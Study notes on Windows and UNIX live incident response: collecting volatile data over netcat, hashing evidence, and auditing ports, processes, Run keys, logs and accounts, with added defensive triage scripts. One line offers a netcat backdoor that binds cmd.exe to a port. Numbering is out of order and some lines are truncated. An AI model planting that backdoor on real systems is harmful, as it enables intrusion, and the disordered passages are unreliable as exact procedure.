Windows Live Response
TRANSCRIPT
8/10/2019 Windows Live Response
1/14
Windows Live Response, Chapter 1
Live Incident Response Process
Start a netcat server on the forensic workstation with the following command:
nc -v -l -p 2222 > command.txt
On the victim computer you will want to run a command to collect live response data. The data can be sent from the victim computer with the following command:
command | nc forensic_workstation_ip_address 2222
(forensic_workstation_ip_address is the IP address of the forensic workstation.)
A simple MD5 checksum of command.txt can be calculated so that you may prove its authenticity at a later date:
md5sum -b command.txt > command.md5
You will always want to use the -b command-line switch. md5sum is available in the Cygwin utilities from www.cygwin.com.
A variant of netcat named cryptcat (http://sourceforge.net/projects/cryptcat) should be used because it encrypts all of the data across the TCP channel. Because the data is encrypted, intruders will not be able to see what you are collecting.
Analyzing Volatile Data
1. System Date and Time
The time and date are simply collected by issuing the time and date commands at the prompt.
2. Current Network Connections
We view a machine's network connections by issuing the netstat command. We specify the -an flags with netstat to retrieve all of the network connections and the raw IP addresses instead of the Fully Qualified Domain Names (FQDN):
netstat -an
Port 139: file sharing port; NetBIOS runs on this port. Port 21: FTP port. A third port, listed with an unrecognized server name, is marked EVIL.
Use www.portsdb.org to find out what services run on ports.
Ports above 1024 typically are ephemeral ports.
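The netstat -an review above, as an added example that is not part of the original notes: a small triage filter that reads netstat output and reports TCP listeners that are not on an allowlist of expected services, tagging anything above 1024 since those ports are normally ephemeral. The allowlist and the sample netstat text are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original notes: triage the output of "netstat -an".
# Every TCP socket in LISTENING state whose port is not on a short allowlist of
# expected services is printed; ports above 1024 are tagged separately because,
# as the notes say, those are normally ephemeral, so a persistent listener there
# deserves a closer look with FPort.
# Assumption: the allowlist below is what this host is supposed to serve.

EXPECTED_PORTS="${EXPECTED_PORTS:-21 80 139 445}"

# triage_listeners: reads netstat -an output on stdin, prints one line per
# unexpected listener in the form "TAG port N local=ADDR:N".
triage_listeners() {
    awk -v expected="$EXPECTED_PORTS" '
    BEGIN { n = split(expected, e, " "); for (i = 1; i <= n; i++) ok[e[i]] = 1 }
    $1 == "TCP" && $4 == "LISTENING" {
        port = $2; sub(/.*:/, "", port)          # keep only the port number
        if (port in ok) next                     # expected service, skip it
        tag = (port + 0 > 1024) ? "UNEXPECTED-HIGH" : "UNEXPECTED"
        printf "%s port %s local=%s\n", tag, port, $2
    }'
}

# Constructed sample, shaped like the Windows netstat -an output in the notes.
SAMPLE_NETSTAT='
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:10000          0.0.0.0:0              LISTENING
  TCP    192.168.1.5:139        192.168.1.9:1044       ESTABLISHED
  UDP    0.0.0.0:137            *:*
'

# count_unexpected: number of listeners triage_listeners reports for the sample.
count_unexpected() {
    printf '%s\n' "$SAMPLE_NETSTAT" | triage_listeners | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_NETSTAT" | triage_listeners
```

On a real host, pipe the saved command.txt from the netcat transfer into triage_listeners instead of the sample.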
3. Open TCP or UDP Ports and Executables Opening TCP or UDP Ports
Use FPort to examine strange ports that are open on the machine and to link them to the executables that opened them. FPort can be found at www.foundstone.com.
Rename your netcat binary with a leading "t" to symbolize that it is trusted.
5. Cached NetBIOS Name Tables
Windows (up until version 2000
To learn the processes the attacker executed, use the pslist tool from the PsTools suite distributed from www.sysinternals.com.
The first several lines can be system processes, based on the lengthy elapsed running time. This is indicative of processes running since startup, which are typical system processes.
PsExec is a tool distributed from www.sysinternals.com that enables a valid user to connect from one Microsoft Windows machine to another and execute a command over a NetBIOS connection. Attackers typically use this tool to run cmd.exe. First, PsExec will only open a channel if you supply proper administrator-level credentials; therefore the attacker has an administrator-level password. Second, the attacker knows one of the passwords, and that password may work on other machines in the enterprise. Third, the attacker must be running a Microsoft Windows system on his attacking machine to execute PsExec.
One of the first things attackers usually do when they gain access to a system is to transfer their tools to the victim machine.
PsExec and PsFile will reveal the NetBIOS name of the computer that is attacking. Once you seize the attacker's computer, you may want to search for that NetBIOS name as a keyword on the attacker's computer.
12. Process Memory Dumps
We need to capture the memory space of the suspect processes. For details on the structure, organization, and management of memory on these operating systems, we recommend the excellent reference Inside Windows 2000, Third Edition by David Solomon and Mark Russinovich.
Microsoft provides a utility called userdump.exe for the Windows NT family of operating systems. This tool is a component of the Microsoft OEM Support Tools package available at:
http://download.microsoft.com/download/win2000srv/Utility/...
net use L: \\...
Sample output:
CommandLine: nc -d -L -n -p <port>
Imaging physical memory and the first physical drive with dd:
D:\> dd.exe if=\\.\physicalmemory of=<drive>:\RWWW_full_memory_dump.dd bs=<block size>
D:\> dd.exe if=\\.\physicaldrive0 of=<drive>:\RWWW_physicaldrive0.dd bs=<block size>
We can capture the complete registry in a rather cryptic format by using RegDmp without command-line options. We can see the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion with three subkeys: Run, RunOnce and RunOnceEx. Any values in Run signify programs that will be executed when the system starts up.
If you want to attack, you can place the following command in the registry to automatically open a backdoor:
nc -d -L -p 10000 -e C:\winnt\system32\cmd.exe
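The defender's side of the Run-key check above, as an added example that is not from the original notes: a scanner that reads a text export of the Run, RunOnce and RunOnceEx keys and flags values that look like the netcat backdoor just shown (a bare nc, a -e shell, cmd.exe, or a program living under a temp directory). It assumes "reg export" (.reg) format rather than RegDmp's layout, and the sample export is constructed.

```shell
#!/bin/sh
# Added example, not from the original notes: scan a text export of the
# Run / RunOnce / RunOnceEx keys for values that resemble the netcat backdoor
# shown above. Assumptions: the export is in "reg export" (.reg) format, not
# RegDmp's layout, and the patterns below are a starting point, not a complete
# list of what an attacker might register.

# audit_run_keys: reads a .reg export on stdin, prints SUSPECT lines.
audit_run_keys() {
    awk '
    { sub(/\r$/, "") }                                   # tolerate CRLF exports
    /^\[HKEY_/ { key = $0; inrun = ($0 ~ /\\Run(Once|OnceEx)?\]$/); next }
    inrun && /^"/ {
        line = tolower($0)
        reason = ""
        if (line ~ /(^|[^a-z])nc(\.exe)?[" ]/)        reason = reason "netcat "
        if (line ~ / -e +[a-z]:\\/)                    reason = reason "-e-shell "
        if (line ~ /cmd\.exe/)                         reason = reason "cmd.exe "
        if (line ~ /\\temp\\|\\tmp\\|\\recycler\\/)    reason = reason "temp-path "
        if (reason != "") printf "SUSPECT %s [%s]\n    %s\n", key, reason, $0
    }'
}

# Constructed sample export (not a real registry dump); the "Backdoor" value
# is the command from the notes as it would appear in a .reg file.
SAMPLE_REG='Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"Backdoor"="nc -d -L -p 10000 -e C:\\winnt\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\WINNT\\Temp\\update.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall]
"DisplayName"="cmd.exe helper"
'

# count_suspects: how many values the scanner flags in the sample (expect 2;
# the Uninstall key is outside the startup keys and is ignored).
count_suspects() { printf '%s\n' "$SAMPLE_REG" | audit_run_keys | grep -c '^SUSPECT'; }

printf '%s\n' "$SAMPLE_REG" | audit_run_keys
```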
4. The Auditing Policy
Win NT and Win 2000 do not have auditing turned on by default; therefore, there are no security-related logs. The command to determine the auditing policy is auditpol. Auditpol is distributed with Microsoft's resource kits.
5. A History of Logins
A history of logins can be obtained with the NTLast command, distributed by www.foundstone.com. NTLast is run without command-line arguments to get all of the login info. It is very important to enable auditing.
6. System Event Logs
There are typically three types of event logs on a Windows machine: Security, Application and System.
The command PsLogList within the PsTools suite distributed at www.sysinternals.com will extract these logs into an easy to read format.
Run: psloglist -s -x security
The -s switch tells psloglist to dump each event on a single line. The -x switch tells psloglist to dump the extended information for each event.
7. User Accounts
Use pwdump, which dumps the user accounts.
8. IIS Logs
You cannot block what you must allow in.
The IIS Web server writes any activity to logs in the C:\winnt\system32\logfiles directory by default. To see what is in the logs, type them out.
First, execute this on the forensic workstation:
nc -v -l -p 2222 > ex030
When attacks are successful against a vulnerable server, they cause the Web server to crash, so the activity is not logged in the IIS log. The Web server should never access the cmd.exe command shell.
9. Suspicious Files
To transfer any suspicious file, run the following on the forensic workstation:
nc -v -l -p 2222 > filename
Then, transfer the file named filename by using type:
type filename | nc forensic_workstation_ip_address 2222
Putting It All Together
See also: http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458
UNIX Live Response, Chapter 2
On the forensic workstation, run:
nc -v -l -p 10000 > command.txt
On the victim computer, run:
command | nc forensic_workstation_ip_address 10000
Remember to press CTRL-C to break the netcat session.
Run: md5sum -b command.txt > command.md5
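The receive-then-hash routine used in both chapters (netcat listener on the forensic workstation, then md5sum -b on what arrived), as an added example that is not part of the original notes: each received artifact is sealed at once with its .md5 file and a custody log line, and can be re-verified later, which is what lets you prove authenticity "at a later date". receive() needs the nc from the notes; seal() and verify() work on any file offline. CASE_DIR and the custody log layout are assumptions.

```shell
#!/bin/sh
# Added example, not from the original notes: receive each command's output
# from the victim with the netcat listener above, then "seal" it at once with
# md5sum -b and a custody log line (UTC time, workstation name, file, hash),
# and verify the seal later. receive() needs nc; seal() and verify() only need
# GNU md5sum. Assumption: CASE_DIR is a writable directory on the workstation.

CASE_DIR="${CASE_DIR:-./case}"
CUSTODY_LOG="${CUSTODY_LOG:-$CASE_DIR/custody.log}"

# receive NAME PORT: listen once on PORT, store the data as CASE_DIR/NAME.txt, seal it.
receive() {
    mkdir -p "$CASE_DIR"
    nc -v -l -p "$2" > "$CASE_DIR/$1.txt"      # the listener from the notes
    seal "$CASE_DIR/$1.txt"
}

# seal FILE: write FILE.md5 beside FILE (md5sum -b, as the notes require) and
# append a custody line; the relative name inside the .md5 keeps it portable.
seal() {
    dir=$(dirname "$1"); base=$(basename "$1")
    mkdir -p "$(dirname "$CUSTODY_LOG")"
    ( cd "$dir" && md5sum -b "$base" > "$base.md5" )
    printf '%s %s %s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$(uname -n)" \
        "$base" "$(cut -d' ' -f1 "$1.md5")" >> "$CUSTODY_LOG"
}

# verify FILE: exit 0 if FILE still matches its sealed hash, 1 if it changed.
verify() {
    ( cd "$(dirname "$1")" && md5sum -c --status "$(basename "$1").md5" )
}

# demo: seal a constructed command.txt, verify it, tamper with it, verify again.
# Returns "ok bad": the intact file verifies, the altered one does not.
demo() {
    d=$(mktemp -d)
    CUSTODY_LOG="$d/custody.log"
    printf 'Active Connections\n  TCP 0.0.0.0:10000 0.0.0.0:0 LISTENING\n' > "$d/command.txt"
    seal "$d/command.txt"
    verify "$d/command.txt" && intact=ok || intact=bad
    printf 'tampered\n' >> "$d/command.txt"
    verify "$d/command.txt" && altered=ok || altered=bad
    rm -rf "$d"
    echo "$intact $altered"
}
```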
1. System Date and Time
Run: date
2. Current Network Connections
Run: netstat -an
Port 515 is the port on which the printer daemon typically listens. Doing a quick search for Redhat 7.0 and the printer daemon (lpd) on www.securityfocus.com, you see that this is a vulnerable TCP port.
3. Open TCP or UDP Ports
Run the following to see the process number that opened the port. This only works on Linux and will not work on other flavors of UNIX:
netstat -anp
The UNIX version of FPort is lsof, for "List Open Files". lsof is the single most powerful tool in the Live Response toolkit for UNIX systems.
Run: lsof -n
A good source on loaded kernel modules is the book Malware: Fighting Malicious Code by Ed Skoudis.
4. Running Processes
Run this to see a list of all the running processes on the system and the users running them:
ps aux
5. Open Files
Run: lsof
6. The Internal Routing Table
netstat -rn
7. Loaded Kernel Modules
Run: lsmod
8. Mounted File Systems
Run: mount or df
Analyzing Nonvolatile Data
1. System Version and Patch Level
Run this to get all the available operating system version information:
uname -a
Run this to get each package and its version number:
rpm -qa
2. File System Time and Date Stamps
Run: find c:\ -printf "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n"
(The fields are mode; access date and time; modification date and time; change date and time; owner UID and GID; size; path.)
3. File System MD5 Checksum Values
Databases of known hashes of known system files are available at www.hashkeeper.org.
To calculate the MD5 checksum for every file on the system, run:
find -type f -xdev -exec md5sum -b {} \;
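The two find commands above (the time/date timeline and the per-file MD5 list), as one added example that is not from the original notes: a function that runs both over a directory tree, writes the results to an output directory, and goes one step beyond the notes by sealing the two result files with their own md5sum line. It assumes GNU find (-printf, -xdev) and GNU md5sum, i.e. the Linux case the notes describe; the demo tree is constructed.

```shell
#!/bin/sh
# Added example, not from the original notes: build the time/date timeline and
# the per-file MD5 list from the two find commands above for one directory
# tree, writing both to an output directory. Assumes GNU find (-printf, -xdev)
# and GNU md5sum, i.e. the Linux case the notes describe.

# Same format string as the notes: mode;atime;mtime;ctime;uid;gid;size;path
FS_FIELDS='%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n'

# fs_snapshot TREE OUTDIR: writes OUTDIR/timeline.txt, OUTDIR/md5.txt and a
# snapshot.md5 sealing both, so the evidence files can be proven unchanged.
fs_snapshot() {
    tree=$1; out=$2
    mkdir -p "$out"
    # one timeline entry per file system object; -xdev stays on one file system
    find "$tree" -xdev -printf "$FS_FIELDS" > "$out/timeline.txt"
    # md5sum -b for every regular file, as in the notes
    find "$tree" -xdev -type f -exec md5sum -b {} \; > "$out/md5.txt"
    ( cd "$out" && md5sum -b timeline.txt md5.txt > snapshot.md5 )
}

# demo: constructed tree with one subdirectory and two files. Returns
# "timeline_lines md5_lines fields_per_line", expected "4 2 11" (the tree
# root, etc/, etc/passwd and hello.txt appear in the timeline; two files are
# hashed; each timeline line has the 11 semicolon-separated fields).
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/tree/etc"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$d/tree/etc/passwd"
    printf 'hello\n' > "$d/tree/hello.txt"
    fs_snapshot "$d/tree" "$d/out"
    tl=$(wc -l < "$d/out/timeline.txt" | tr -d ' ')
    md=$(wc -l < "$d/out/md5.txt" | tr -d ' ')
    fields=$(head -n 1 "$d/out/timeline.txt" | awk -F';' '{ print NF }')
    rm -rf "$d"
    echo "$tl $md $fields"
}
```

Run it against the live root as fs_snapshot / /mnt/evidence from a trusted shell; the timeline can then be sorted on any of the date fields with sort -t';'.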
4. Users Currently Logged On
Users who are currently logged on are recorded in the /var/run/utmp log.
Run: w
Attackers who want to seriously hamper your investigation can use zap2, publicly available from www.packetstormsecurity.com.
5. A History of Logins
A history of logins is saved in the /var/log/wtmp binary logs.
Run: last
Datapipe is a utility that will listen on one port and forward the traffic to another port on another machine.
6. Syslog Logs
The syslog daemon listens for messages from either local programs or other servers on the Internet and logs them according to the /etc/syslog.conf configuration file.
The two logs relevant to an investigation are /var/log/messages and /var/log/secure. The fifth field is the message that was logged. When buffer overflows occur, they break valid programs. When programs break, garbage is typically generated in the log.
7. User Accounts
Examine /etc/passwd to see whether the intruder has added any rogue user accounts.
A rogue account can have a home directory of / and, more importantly, a user ID of zero.
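The /etc/passwd review above, as an added example that is not from the original notes: an awk filter that flags the two traits the notes name (UID 0 on a non-root account, home directory of /) and adds the related checks a reviewer would want (root's home moved away from /root, a duplicated UID, an unusual login shell). The sample passwd lines, including the "toor" rogue account, are constructed.

```shell
#!/bin/sh
# Added example, not from the original notes: flag /etc/passwd entries with the
# two traits the notes call out (UID 0 and a home directory of /), plus a few
# related checks. Reads passwd-format lines on stdin; the extra shell patterns
# are an assumption about what an intruder-created account tends to look like.

# audit_passwd: prints "SUSPECT user uid=.. home=.. shell=.. [reasons]" lines.
audit_passwd() {
    awk -F: '
    NF < 7 { printf "MALFORMED %s\n", $0; next }
    {
        flags = ""
        if ($3 == 0 && $1 != "root")                   flags = flags "uid0 "
        if ($6 == "/")                                 flags = flags "home-is-root "
        if ($3 == 0 && $1 == "root" && $6 != "/root")  flags = flags "root-home-moved "
        if (seen[$3]++ && $3 != 0)                     flags = flags "duplicate-uid "
        if ($7 ~ /(nc|netcat|datapipe)$/)              flags = flags "odd-shell "
        if (flags != "")
            printf "SUSPECT %s uid=%s home=%s shell=%s [%s]\n", $1, $3, $6, $7, flags
    }'
}

# Constructed sample; "toor" imitates the rogue account described above, and
# "bob" reuses alice's UID so the two are the same user to the kernel.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
toor:x:0:0:backup operator:/:/bin/sh
alice:x:500:500:Alice:/home/alice:/bin/bash
guest:x:501:501::/:/bin/bash
bob:x:500:500:Bob:/home/bob:/bin/bash
'

# count_suspects: number of flagged accounts in the sample (toor, guest, bob).
count_suspects() { printf '%s' "$SAMPLE_PASSWD" | audit_passwd | grep -c '^SUSPECT'; }

printf '%s' "$SAMPLE_PASSWD" | audit_passwd
```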
8. User History Files
Go to username/.bash_history to see files that may contain commands that failed. For example, ps auxw | grep datapipe shows the intruder looking for the keyword datapipe.
Transfer the file named filename to the forensic workstation:
cat filename | nc forensic_workstation_ip_address 10000
By entering the /proc directory you can see references to running processes and other system information. You see directories named after integers, such as 1.